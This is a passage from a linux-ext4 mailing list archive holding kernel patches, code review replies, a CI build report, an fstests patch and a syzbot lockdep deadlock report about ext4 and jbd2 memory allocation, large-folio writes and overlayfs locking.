   is written/mapped.

The loop adds at most one extra ext4_map_blocks() call per extent
boundary, which is negligible compared to the lock contention it
eliminates.

Reproducer: two threads doing O_DIRECT I/O on a fallocated ext4 file.
Thread 1 appends sequentially in 4-16 KB writes.  Thread 2 reads from
the tail of the file in up to 1 MB reads.  Both use the same fd with
the file preallocated via posix_fallocate().

Tested on ext4 over NVMe, 6.6 based kernel:

                              before          after
  writer-only throughput:     399 MB/s        412 MB/s
  mixed (writer + reader):     11 MB/s        381 MB/s
  write latency (mixed):     880 us            21 us
  rwsem_down_write_slowpath
   (5 s sample, mixed):       1792              2

Signed-off-by: Peng Wang <peng_wang@linux.alibaba.com>
---
 fs/ext4/file.c | 25 ++++++++++++++++---------
 1 file changed, 16 insertions(+), 9 deletions(-)

diff --git a/fs/ext4/file.c b/fs/ext4/file.c
index eb1a323962b1..d060de8eddac 100644
--- a/fs/ext4/file.c
+++ b/fs/ext4/file.c
@@ -228,15 +228,22 @@ static bool ext4_overwrite_io(struct inode *inode,
 	map.m_len = EXT4_MAX_BLOCKS(len, pos, blkbits);
 	blklen = map.m_len;
 
-	err = ext4_map_blocks(NULL, inode, &map, 0);
-	if (err != blklen)
-		return false;
-	/*
-	 * 'err==len' means that all of the blocks have been preallocated,
-	 * regardless of whether they have been initialized or not. We need to
-	 * check m_flags to distinguish the unwritten extents.
-	 */
-	*unwritten = !(map.m_flags & EXT4_MAP_MAPPED);
+	*unwritten = false;
+
+	while (blklen > 0) {
+		map.m_len = blklen;
+		err = ext4_map_blocks(NULL, inode, &map, 0);
+		/*
+		 * err <= 0 means a hole or error; the write needs block
+		 * allocation so it cannot be treated as an overwrite.
+		 */
+		if (err <= 0)
+			return false;
+		if (!(map.m_flags & EXT4_MAP_MAPPED))
+			*unwritten = true;
+		blklen -= err;
+		map.m_lblk += err;
+	}
 	return true;
 }
 
-- 
2.43.0


^ permalink raw reply related

* [tytso-ext4:dev] BUILD SUCCESS 3ca1d19c1971ac4f25478eafb741e726bf2d5954
From: kernel test robot @ 2026-06-06  2:03 UTC (permalink / raw)
  To: Theodore Ts'o; +Cc: linux-ext4

tree/branch: https://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4.git dev
branch HEAD: 3ca1d19c1971ac4f25478eafb741e726bf2d5954  ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers

elapsed time: 1717m

configs tested: 180
configs skipped: 15

The following configs have been built successfully.
More configs may be tested in the coming days.

tested configs:
alpha                             allnoconfig    gcc-15.2.0
alpha                            allyesconfig    gcc-16.1.0
alpha                               defconfig    gcc-16.1.0
arc                               allnoconfig    gcc-15.2.0
arc                              allyesconfig    gcc-15.2.0
arc                                 defconfig    gcc-16.1.0
arc                            randconfig-001    gcc-8.5.0
arc                   randconfig-001-20260605    gcc-8.5.0
arc                            randconfig-002    gcc-8.5.0
arc                   randconfig-002-20260605    gcc-9.5.0
arm                               allnoconfig    clang-23
arm                                 defconfig    clang-23
arm                            randconfig-001    gcc-16.1.0
arm                   randconfig-001-20260605    gcc-13.4.0
arm                            randconfig-002    gcc-15.2.0
arm                   randconfig-002-20260605    gcc-8.5.0
arm                            randconfig-003    clang-23
arm                   randconfig-003-20260605    clang-23
arm                            randconfig-004    gcc-13.4.0
arm                   randconfig-004-20260605    gcc-15.2.0
arm64                            allmodconfig    clang-19
arm64                             allnoconfig    gcc-15.2.0
arm64                               defconfig    gcc-16.1.0
arm64                 randconfig-001-20260605    gcc-9.5.0
arm64                 randconfig-002-20260605    gcc-10.5.0
arm64                 randconfig-003-20260605    gcc-11.5.0
arm64                 randconfig-004-20260605    clang-23
csky                             allmodconfig    gcc-15.2.0
csky                              allnoconfig    gcc-15.2.0
csky                                defconfig    gcc-16.1.0
csky                  randconfig-001-20260605    gcc-16.1.0
csky                  randconfig-002-20260605    gcc-9.5.0
hexagon                          allmodconfig    clang-23
hexagon                           allnoconfig    clang-23
hexagon                             defconfig    clang-23
hexagon               randconfig-001-20260605    clang-20
hexagon               randconfig-002-20260605    clang-23
i386                             allmodconfig    gcc-14
i386                              allnoconfig    gcc-14
i386                             allyesconfig    gcc-14
i386                 buildonly-randconfig-001    gcc-14
i386        buildonly-randconfig-001-20260605    clang-22
i386                 buildonly-randconfig-002    clang-22
i386        buildonly-randconfig-002-20260605    clang-22
i386                 buildonly-randconfig-003    clang-22
i386        buildonly-randconfig-003-20260605    clang-22
i386                 buildonly-randconfig-004    gcc-14
i386        buildonly-randconfig-004-20260605    clang-22
i386                 buildonly-randconfig-005    gcc-14
i386        buildonly-randconfig-005-20260605    gcc-12
i386                 buildonly-randconfig-006    gcc-14
i386        buildonly-randconfig-006-20260605    gcc-14
i386                                defconfig    clang-22
i386                  randconfig-001-20260605    clang-20
i386                  randconfig-002-20260605    clang-20
i386                  randconfig-003-20260605    gcc-14
i386                  randconfig-004-20260605    gcc-14
i386                  randconfig-005-20260605    clang-20
i386                  randconfig-006-20260605    gcc-14
i386                  randconfig-007-20260605    clang-20
i386                  randconfig-011-20260605    clang-22
i386                  randconfig-012-20260605    clang-22
i386                  randconfig-013-20260605    clang-22
i386                  randconfig-014-20260605    clang-22
i386                  randconfig-015-20260605    clang-22
i386                  randconfig-016-20260605    clang-22
i386                  randconfig-017-20260605    clang-22
loongarch                        allmodconfig    clang-19
loongarch                         allnoconfig    clang-23
loongarch                           defconfig    clang-23
loongarch             randconfig-001-20260605    clang-18
loongarch             randconfig-002-20260605    gcc-16.1.0
m68k                             allmodconfig    gcc-15.2.0
m68k                              allnoconfig    gcc-15.2.0
m68k                             allyesconfig    gcc-16.1.0
m68k                                defconfig    gcc-16.1.0
microblaze                        allnoconfig    gcc-15.2.0
microblaze                       allyesconfig    gcc-15.2.0
microblaze                          defconfig    gcc-16.1.0
mips                             allmodconfig    gcc-15.2.0
mips                              allnoconfig    gcc-15.2.0
mips                             allyesconfig    gcc-15.2.0
nios2                            allmodconfig    gcc-11.5.0
nios2                             allnoconfig    gcc-11.5.0
nios2                               defconfig    gcc-11.5.0
nios2                 randconfig-001-20260605    gcc-8.5.0
nios2                 randconfig-002-20260605    gcc-8.5.0
openrisc                         allmodconfig    gcc-15.2.0
openrisc                          allnoconfig    gcc-15.2.0
openrisc                            defconfig    gcc-16.1.0
parisc                           allmodconfig    gcc-15.2.0
parisc                            allnoconfig    gcc-15.2.0
parisc                           allyesconfig    gcc-15.2.0
parisc                              defconfig    gcc-16.1.0
parisc                randconfig-001-20260605    gcc-14.3.0
parisc                randconfig-002-20260605    gcc-12.5.0
parisc64                            defconfig    gcc-16.1.0
powerpc                          allmodconfig    gcc-15.2.0
powerpc                           allnoconfig    gcc-15.2.0
powerpc               randconfig-001-20260605    gcc-8.5.0
powerpc               randconfig-002-20260605    gcc-8.5.0
powerpc64             randconfig-001-20260605    clang-23
powerpc64             randconfig-002-20260605    gcc-8.5.0
riscv                             allnoconfig    gcc-15.2.0
riscv                               defconfig    clang-23
riscv                          randconfig-001    gcc-8.5.0
riscv                 randconfig-001-20260605    gcc-8.5.0
riscv                          randconfig-002    clang-23
riscv                 randconfig-002-20260605    clang-23
s390                             allmodconfig    clang-18
s390                              allnoconfig    clang-23
s390                             allyesconfig    gcc-15.2.0
s390                                defconfig    clang-18
s390                           randconfig-001    gcc-11.5.0
s390                  randconfig-001-20260605    clang-23
s390                           randconfig-002    clang-23
s390                  randconfig-002-20260605    clang-23
sh                               allmodconfig    gcc-16.1.0
sh                                allnoconfig    gcc-15.2.0
sh                               allyesconfig    gcc-15.2.0
sh                                  defconfig    gcc-16.1.0
sh                             randconfig-001    gcc-16.1.0
sh                    randconfig-001-20260605    gcc-16.1.0
sh                             randconfig-002    gcc-14.3.0
sh                    randconfig-002-20260605    gcc-10.5.0
sparc                             allnoconfig    gcc-15.2.0
sparc                               defconfig    gcc-16.1.0
sparc                 randconfig-001-20260605    gcc-15.2.0
sparc                 randconfig-002-20260605    gcc-16.1.0
sparc64                          allmodconfig    clang-23
sparc64                             defconfig    clang-23
sparc64               randconfig-001-20260605    clang-23
sparc64               randconfig-002-20260605    clang-23
um                               allmodconfig    clang-19
um                                allnoconfig    clang-23
um                               allyesconfig    gcc-14
um                                  defconfig    clang-23
um                             i386_defconfig    gcc-14
um                    randconfig-001-20260605    clang-19
um                    randconfig-002-20260605    clang-23
um                           x86_64_defconfig    clang-23
x86_64                           allmodconfig    clang-22
x86_64                            allnoconfig    clang-20
x86_64                           allyesconfig    clang-22
x86_64               buildonly-randconfig-001    gcc-12
x86_64      buildonly-randconfig-001-20260605    gcc-14
x86_64               buildonly-randconfig-002    clang-20
x86_64      buildonly-randconfig-002-20260605    gcc-14
x86_64               buildonly-randconfig-003    gcc-14
x86_64      buildonly-randconfig-003-20260605    gcc-14
x86_64               buildonly-randconfig-004    gcc-14
x86_64      buildonly-randconfig-004-20260605    gcc-14
x86_64               buildonly-randconfig-005    gcc-14
x86_64      buildonly-randconfig-005-20260605    gcc-14
x86_64               buildonly-randconfig-006    clang-20
x86_64      buildonly-randconfig-006-20260605    gcc-14
x86_64                              defconfig    gcc-14
x86_64                randconfig-001-20260605    clang-22
x86_64                randconfig-002-20260605    clang-22
x86_64                randconfig-003-20260605    clang-22
x86_64                randconfig-004-20260605    gcc-13
x86_64                randconfig-005-20260605    clang-22
x86_64                randconfig-006-20260605    gcc-14
x86_64                randconfig-011-20260605    clang-22
x86_64                randconfig-012-20260605    gcc-14
x86_64                randconfig-013-20260605    clang-22
x86_64                randconfig-014-20260605    clang-22
x86_64                randconfig-015-20260605    gcc-14
x86_64                randconfig-016-20260605    clang-22
x86_64                randconfig-071-20260605    gcc-14
x86_64                randconfig-072-20260605    gcc-14
x86_64                randconfig-073-20260605    clang-20
x86_64                randconfig-074-20260605    gcc-14
x86_64                randconfig-075-20260605    gcc-12
x86_64                randconfig-076-20260605    gcc-14
x86_64                          rhel-9.4-rust    clang-22
xtensa                           alldefconfig    gcc-16.1.0
xtensa                            allnoconfig    gcc-15.2.0
xtensa                randconfig-001-20260605    gcc-8.5.0
xtensa                randconfig-002-20260605    gcc-8.5.0

--
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki

^ permalink raw reply

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-05 20:54 UTC (permalink / raw)
  To: David Laight
  Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
	Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>

On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
> 
> ...
> > I suppose we could do it with kmalloc() with some flags which to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc().  Is there a better way?
> 
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.

Please don't try to help.

^ permalink raw reply

* Re: [PATCH 00/17] replace __get_free_pages() call with kmalloc()
From: Zi Yan @ 2026-06-05 20:00 UTC (permalink / raw)
  To: Mike Rapoport (Microsoft)
  Cc: Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi, Ryusuke Konishi,
	Viacheslav Dubeyko, Trond Myklebust, Anna Schumaker, Chuck Lever,
	Jeff Layton, NeilBrown, Olga Kornievskaia, Dai Ngo, Tom Talpey,
	Alexander Viro, Christian Brauner, Jan Kara, Dave Kleikamp,
	Theodore Ts'o, Miklos Szeredi, Andreas Hindborg, Breno Leitao,
	Kees Cook, Tigran A. Aivazian, linux-kernel, linux-fsdevel,
	ocfs2-devel, linux-nilfs, linux-nfs, jfs-discussion, linux-ext4,
	linux-mm
In-Reply-To: <20260523-b4-fs-v1-0-275e36a83f0e@kernel.org>

On 23 May 2026, at 13:54, Mike Rapoport (Microsoft) wrote:

> This is a (small) part of larger work of replacing page allocator calls
> with kmalloc.

Is the goal to get rid of __get_free_page(s)()?

Thanks.

>
> Also in git:
> https://git.kernel.org/pub/scm/linux/kernel/git/rppt/linux.git gfp-to-kmalloc/fs
>
> Signed-off-by: Mike Rapoport (Microsoft) <rppt@kernel.org>
> ---
> Mike Rapoport (Microsoft) (17):
>       quota: allocate dquot_hash with kmalloc()
>       proc: replace __get_free_page() with kmalloc()
>       ocfs2/dlm: replace __get_free_page() with kmalloc()
>       nilfs2: replace get_zeroed_page() with kzalloc()
>       NFS: replace __get_free_page() with kmalloc() in nfs_show_devname()
>       NFS: remove unused page and page2 in nfs4_replace_transport()
>       NFSD: replace __get_free_page() with kmalloc() in nfsd_buffered_readdir()
>       libfs: simple_transaction_get(): replace get_zeroed_page() with kzalloc()
>       jfs: replace __get_free_page() with kmalloc()
>       jbd2: replace __get_free_pages() with kmalloc()
>       isofs: replace __get_free_page() with kmalloc()
>       fuse: replace __get_free_page() with kmalloc()
>       fs/select: replace __get_free_page() with kmalloc()
>       fs/namespace: use __getname() to allocate mntpath buffer
>       configfs: replace __get_free_pages() with kzalloc()
>       binfmt_misc: replace __get_free_page() with kmalloc()
>       bfs: replace get_zeroed_page() with kzalloc()
>
>  fs/bfs/inode.c             |  4 ++--
>  fs/binfmt_misc.c           |  4 ++--
>  fs/configfs/file.c         |  7 +++----
>  fs/fuse/ioctl.c            |  5 +++--
>  fs/isofs/dir.c             |  5 +++--
>  fs/jbd2/journal.c          |  7 ++-----
>  fs/jfs/jfs_dtree.c         | 16 ++++++++--------
>  fs/libfs.c                 |  6 +++---
>  fs/namespace.c             |  4 ++--
>  fs/nfs/nfs4namespace.c     | 15 +--------------
>  fs/nfs/super.c             |  4 ++--
>  fs/nfsd/vfs.c              |  4 ++--
>  fs/nilfs2/ioctl.c          |  4 ++--
>  fs/ocfs2/dlm/dlmdebug.c    | 24 +++++++++---------------
>  fs/ocfs2/dlm/dlmdomain.c   |  8 +++++---
>  fs/ocfs2/dlm/dlmmaster.c   |  5 ++---
>  fs/ocfs2/dlm/dlmrecovery.c |  4 ++--
>  fs/proc/base.c             | 16 ++++++++--------
>  fs/quota/dquot.c           | 11 +++++------
>  fs/select.c                |  4 ++--
>  20 files changed, 68 insertions(+), 89 deletions(-)
> ---
> base-commit: 5d6919055dec134de3c40167a490f33c74c12581
> change-id: 20260522-b4-fs-5e5c70f31664
>
> Best regards,
> --
> Sincerely yours,
> Mike.


Best Regards,
Yan, Zi

^ permalink raw reply

* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Matthew Wilcox @ 2026-06-05 14:24 UTC (permalink / raw)
  To: Jia Zhu
  Cc: Theodore Ts'o, Andreas Dilger, Alexander Viro,
	Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <20260605090253.32822-1-zhujia.zj@bytedance.com>

On Fri, Jun 05, 2026 at 05:02:53PM +0800, Jia Zhu wrote:
> On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> > Is this a common case for you, or is this something you noticed by
> > inspection?
> 
> This was found by our kernel release benchmark.  We run libMicro as part
> of that test suite:
> 
>   https://github.com/rzezeski/libMicro
> 
> The regression shows up in buffered write/pwrite/writev overwrite tests
> on ext4 large folios.

Makes sense.  I'll assume this can correspond to a reasonable workload.
It certainly seems like something that could exist.

> > Wouldn't you get just as much benefit from this?
> 
> Yes.  I tested this approach, and it gives almost the same result as my
> original partial-commit helper.

Excellent!  Obviously it'd be even better if we didn't have to walk the
leading buffer_heads ... but there's no way to do this with the data
structure we have.

> Agreed.  The original ext4_block_write_begin() change was too aggressive.
> Seeking directly to @from also skips the prefix buffers, which makes the
> old side effects harder to prove.
> 
> For v2 I plan to drop that part and keep the existing walk from the head.
> The ext4 change would only stop after @to when the folio was already
> uptodate on entry, similar to your block_commit_write() suggestion:
> 
> +       bool folio_uptodate = folio_test_uptodate(folio);
> +
>         for (bh = head, block_start = 0;
> -            bh != head || !block_start;
> +            (bh != head || !block_start) &&
> +            (!folio_uptodate || block_start < to);
>              block++, block_start = block_end, bh = bh->b_this_page) {
>                 ...
>         }

Yes, I think that's a good approach.

> So the prefix path and all in-range handling stay unchanged.  The only
> skipped work is the tail part after @to, and only for a folio that was
> already uptodate before write_begin() started.
> 
> > ... converting ext4 to use iomap instead of buffer heads.
> 
> I strongly agree that iomap is the right direction for ext4.  The iomap
> buffered write path would make this particular buffer-head walk cost go
> away.
> 
> The reason I am still looking at this path is that the regression is
> visible in our LTS upgrade testing from 6.12 to 6.18.  It was introduced
> by the ext4 large-folio enablement in v6.16.  For example, in our
> libMicro release benchmark with THP always enabled, usecs/call, lower is
> better:
> 
> case        v6.12        v6.18        regression
> write_u1k   0.609        4.659        +665.0%
> write_u10k  1.408        4.869        +245.8%

Ouch ;-)  No wonder you want to address this.  Do you recover all the
regression with this fix?

> The iomap conversion is the long-term fix, but it does not help kernels
> which still use the buffer-head buffered write path.  I would like to keep
> this as a small regression fix for that path, and make it minimal enough
> to be suitable for stable/LTS backport.

Is it that you're using some ext4 features that aren't supported by
iomap yet?  Could you say which ones?  That might motivate someone to
prioritise that support.

> Would this v2 direction look OK to you?

Absolutely.  Very happy with this approach.

^ permalink raw reply

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Uladzislau Rezki @ 2026-06-05  9:50 UTC (permalink / raw)
  To: David Laight
  Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
	Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>

On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
> 
> ...
> > I suppose we could do it with kmalloc() with some flags which to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc().  Is there a better way?
> 
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.
> 
I assume you mean kvmalloc()? kvalloc() is something unknown to me.

--
Uladzislau Rezki

^ permalink raw reply

* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Jia Zhu @ 2026-06-05  9:02 UTC (permalink / raw)
  To: Matthew Wilcox
  Cc: Jia Zhu, Theodore Ts'o, Andreas Dilger, Alexander Viro,
	Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <aiBuZE5NWMfOGAA6@casper.infradead.org>

On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> Is this a common case for you, or is this something you noticed by
> inspection?

This was found by our kernel release benchmark.  We run libMicro as part
of that test suite:

  https://github.com/rzezeski/libMicro

The regression shows up in buffered write/pwrite/writev overwrite tests
on ext4 large folios.

> Wouldn't you get just as much benefit from this?

Yes.  I tested this approach, and it gives almost the same result as my
original partial-commit helper.

I agree this is a better direction for block_commit_write().  It keeps the
existing buffer-head state handling and only stops the tail walk after an
already-uptodate folio has been committed through @to.  That removes the
main large-folio cost in our small-overwrite benchmark while keeping the
change much closer to the old code.

> I'm unconvinced that this is safe ...

Agreed.  The original ext4_block_write_begin() change was too aggressive.
Seeking directly to @from also skips the prefix buffers, which makes the
old side effects harder to prove.

For v2 I plan to drop that part and keep the existing walk from the head.
The ext4 change would only stop after @to when the folio was already
uptodate on entry, similar to your block_commit_write() suggestion:

+       bool folio_uptodate = folio_test_uptodate(folio);
+
        for (bh = head, block_start = 0;
-            bh != head || !block_start;
+            (bh != head || !block_start) &&
+            (!folio_uptodate || block_start < to);
             block++, block_start = block_end, bh = bh->b_this_page) {
                ...
        }

So the prefix path and all in-range handling stay unchanged.  The only
skipped work is the tail part after @to, and only for a folio that was
already uptodate before write_begin() started.

> ... converting ext4 to use iomap instead of buffer heads.

I strongly agree that iomap is the right direction for ext4.  The iomap
buffered write path would make this particular buffer-head walk cost go
away.

The reason I am still looking at this path is that the regression is
visible in our LTS upgrade testing from 6.12 to 6.18.  It was introduced
by the ext4 large-folio enablement in v6.16.  For example, in our
libMicro release benchmark with THP always enabled, usecs/call, lower is
better:

case        v6.12        v6.18        regression
write_u1k   0.609        4.659        +665.0%
write_u10k  1.408        4.869        +245.8%

The iomap conversion is the long-term fix, but it does not help kernels
which still use the buffer-head buffered write path.  I would like to keep
this as a small regression fix for that path, and make it minimal enough
to be suitable for stable/LTS backport.

Would this v2 direction look OK to you?

^ permalink raw reply

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: David Laight @ 2026-06-05  8:33 UTC (permalink / raw)
  To: Theodore Tso
  Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
	Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>

On Thu, 4 Jun 2026 10:05:52 -0400
"Theodore Tso" <tytso@mit.edu> wrote:

...
> I suppose we could do it with kmalloc() with some flags which to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc().  Is there a better way?

There is already kvalloc().
I'm not sure how hard that tries to get kmalloc() to succeed.

-- David

> 
> Thanks,
> 
> 					- Ted
> 


^ permalink raw reply

* Re: [PATCH RFC 10/17] ext4: use fast incremental CRC update in ext4_free_inode()
From: Baokun Li @ 2026-06-05  7:55 UTC (permalink / raw)
  To: Theodore Tso; +Cc: linux-ext4, sashiko
In-Reply-To: <h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit>

On 2026/6/3 22:17, Theodore Tso wrote:
> On Fri, May 08, 2026 at 11:33:05PM +0000, sashiko-bot@kernel.org wrote:
>> Thank you for your contribution! Sashiko AI review found 1 potential issue(s) to consider:
>> - [High] ext4_inode_bitmap_csum_set_fast() corrupts the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not a multiple of 8.
>>
>>> -	ext4_inode_bitmap_csum_set(sb, gdp, bitmap_bh);
>>> +	ext4_inode_bitmap_csum_set_fast(sb, gdp, bit);
>> Can this corrupt the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not
>> a multiple of 8?
>>
>> In ext4_inode_bitmap_csum_set(), the CRC32c checksum is computed over exactly
>> EXT4_INODES_PER_GROUP(sb) >> 3 bytes. If s_inodes_per_group is not a multiple
>> of 8, any trailing fractional bits are strictly excluded from the checksum
>> calculation.
>>
>> Because ext4_fill_super() does not enforce that s_inodes_per_group is a
>> multiple of 8, a crafted filesystem can have an unaligned s_inodes_per_group.
> The reason why ext4_fill_super() doesn't enforce that
> s_inodes_per_group is a multiple of 8 was that a long time ago, back
> when Android was allergic to GPLv2 in userspace, they implemented
> their own version of mke2fs (and didn't run fsck on the file system,
> sigh).  Their MIT licensed version of make_ext4fs would occasionally
> make file systems that were not a multiple of 8, and this ran afoul of
> e2fsck[1] if someone actually tried to repair a corrupted Android user
> data file system (as opposed to just wiping the flash and starting
> from scratch).
>
> [1] https://sourceforge.net/p/e2fsprogs/bugs/292/
>
> This was fixed long ago (over a decade ago), and so at this point, I'm
> pretty sure any such mobile handsets are in the landfill, so we
> probably should fix this by adding a check in ext4_fill_super() and a
> corresponding check in e2fsck.
>
> 					- Ted

Hi Ted,

Thank you for your information and suggestions.

I will send two fix patches to synchronize the checks in mke2fs
with ext4_fill_super and e2fsck.


Thanks,
Baokun


^ permalink raw reply

* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Disha Goel @ 2026-06-05  7:02 UTC (permalink / raw)
  To: Darrick J. Wong
  Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
	ojaswin
In-Reply-To: <20260604145434.GG6095@frogsfrogsfrogs>

On 04/06/26 8:24 pm, Darrick J. Wong wrote:
> On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
>> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
>> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
>> on DAX files.
>>
>> Add an ext4-specific check in _require_defrag() to skip tests when DAX
>> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
>> generic/018.
>>
>> XFS defrag works with DAX, so this check is ext4-specific.
>>
>> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
>> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
>> ---
>> Changes in v2:
>> - Made the check ext4-specific as XFS defrag works with DAX
>>    (feedback from Darrick)
>> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
>> - Removed unnecessary comment as _notrun message is self-explanatory
>>
>>   common/defrag | 4 ++++
>>   1 file changed, 4 insertions(+)
>>
>> diff --git a/common/defrag b/common/defrag
>> index 055d0d0e..f17271cd 100644
>> --- a/common/defrag
>> +++ b/common/defrag
>> @@ -6,6 +6,10 @@
>>   
>>   _require_defrag()
>>   {
>> +    if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then
> 
> Shouldn't this be:
> 
> 	ext4)
> 		__scratch_uses_fsdax && _notrun "..."
> 		;;
> 
> in the case statement below?
> 
> --D

Yes, that makes more sense. Keeping the ext4-specific check inside the
ext4 case is cleaner and more consistent with the existing structure.

I'll send v3 with this change.

> 
>> +        _notrun "ext4 online defrag not supported with DAX"
>> +    fi
>> +
>>       case "$FSTYP" in
>>       xfs)
>>           # xfs_fsr does preallocates, require "falloc"
>> -- 
>> 2.45.1
>>

-- 
Regards,
Disha


^ permalink raw reply

* [syzbot] [overlayfs?] [ext4?] possible deadlock in lock_two_nondirectories (2)
From: syzbot @ 2026-06-04 21:33 UTC (permalink / raw)
  To: amir73il, linux-ext4, linux-kernel, linux-unionfs, miklos,
	syzkaller-bugs

Hello,

syzbot found the following issue on:

HEAD commit:    ba3e43a9e601 Merge tag 'soc-fixes-7.1-2' of git://git.kern..
git tree:       upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=1033aa56580000
kernel config:  https://syzkaller.appspot.com/x/.config?x=bd38685893011045
dashboard link: https://syzkaller.appspot.com/bug?extid=ad6118a7584b607c67f2
compiler:       Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
syz repro:      https://syzkaller.appspot.com/x/repro.syz?x=17e2f3ec580000
C reproducer:   https://syzkaller.appspot.com/x/repro.c?x=174c2a66580000

Downloadable assets:
disk image: https://storage.googleapis.com/syzbot-assets/8759ddf1bfa7/disk-ba3e43a9.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/e2f0e563c705/vmlinux-ba3e43a9.xz
kernel image: https://storage.googleapis.com/syzbot-assets/b40bdb37a0d7/bzImage-ba3e43a9.xz
mounted in repro: https://storage.googleapis.com/syzbot-assets/4074e1f6d9f8/mount_0.gz
  fsck result: failed (log: https://syzkaller.appspot.com/x/fsck.log?x=1103db7e580000)

IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+ad6118a7584b607c67f2@syzkaller.appspotmail.com

EXT4-fs: Ignoring removed bh option
EXT4-fs (loop0): stripe (5) is not aligned with cluster size (16), stripe is disabled
EXT4-fs (loop0): mounted filesystem 00000000-0000-0000-0000-000000000000 r/w without journal. Quota mode: none.
======================================================
WARNING: possible circular locking dependency detected
syzkaller #0 Not tainted
------------------------------------------------------
syz.0.22/5968 is trying to acquire lock:
ffff88805aab44a0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}, at: inode_lock include/linux/fs.h:1029 [inline]
ffff88805aab44a0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}, at: lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254

but task is already holding lock:
ffff88803ea9c480 (sb_writers#4){.+.+}-{0:0}, at: mnt_want_write_file+0x63/0x210 fs/namespace.c:537

which lock already depends on the new lock.


the existing dependency chain (in reverse order) is:

-> #1 (sb_writers#4){.+.+}-{0:0}:
       percpu_down_read_internal include/linux/percpu-rwsem.h:53 [inline]
       percpu_down_read_freezable include/linux/percpu-rwsem.h:83 [inline]
       __sb_start_write include/linux/fs/super.h:19 [inline]
       sb_start_write+0x4d/0x1c0 include/linux/fs/super.h:125
       file_start_write include/linux/fs.h:2724 [inline]
       vfs_iter_write+0x1f8/0x610 fs/read_write.c:982
